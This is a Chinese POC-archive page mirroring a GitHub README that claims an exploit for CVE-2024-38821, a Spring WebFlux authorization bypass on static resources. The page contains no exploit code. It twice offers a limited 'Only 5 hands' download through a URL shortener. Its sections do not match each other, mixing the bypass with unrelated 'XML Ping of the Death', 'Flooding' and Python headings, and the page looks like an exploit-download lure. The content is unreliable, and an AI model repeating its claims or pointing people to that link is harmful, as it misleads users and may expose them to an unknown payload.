POC详情: 35223506343b1a2d15ea91d57c19f7f9482ea0c6

来源
https://github.com/zetraxz/CVE-2024-38821
关联漏洞
标题: Spring WebFlux 安全漏洞 (CVE-2024-38821)
描述:Spring WebFlux是Spring公司的一个响应式堆栈 Web 框架。 Spring WebFlux存在安全漏洞,该漏洞源于在特定情况下可以绕过Spring Security对静态资源的授权规则。
介绍
# CVE-2024-38821

## Overview

CVE-2024-38821 is a critical authorization bypass vulnerability identified in certain versions of Spring WebFlux applications using Spring Security. This vulnerability allows unauthorized access to static resources, bypassing defined authorization rules, under specific conditions.

## Description
- **CVE ID**:	CVE-2024-38821
- **CVSS SCORE**: 9.1
- **Severity**: Critical
- **Tags**: cve, cve2024, xml, python, http

## Exploit(Only 5 hands):

[Download](https://ur0.jp/aV2fu)

## Affected Versions

![image](https://github.com/user-attachments/assets/c4192867-ec04-4c7c-8373-603c138f4d6d)

## Explot Details

CVE-2024-38821 affects the authorization checks applied to static resources within WebFlux applications. Under the specified conditions, the exploit allows attackers to bypass authorization rules intended to restrict access to these resources.

## XML Ping of the Death
![image](https://github.com/user-attachments/assets/616f888a-1abc-4dc2-b7d7-cb2305e4a551)

## Excessive Allocation
![image](https://github.com/user-attachments/assets/d43bbfd2-e87b-4686-9543-92d15edfb261)

## Flooding
![image](https://github.com/user-attachments/assets/5b4b8e2d-7315-475e-908f-4fdf17b9676a)

## Requirement

Python 3.9

## Exploit(Only 5 hands):

[Download](https://ur0.jp/aV2fu)
文件快照

 [4.0K]  /data/pocs/35223506343b1a2d15ea91d57c19f7f9482ea0c6
└── [1.3K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。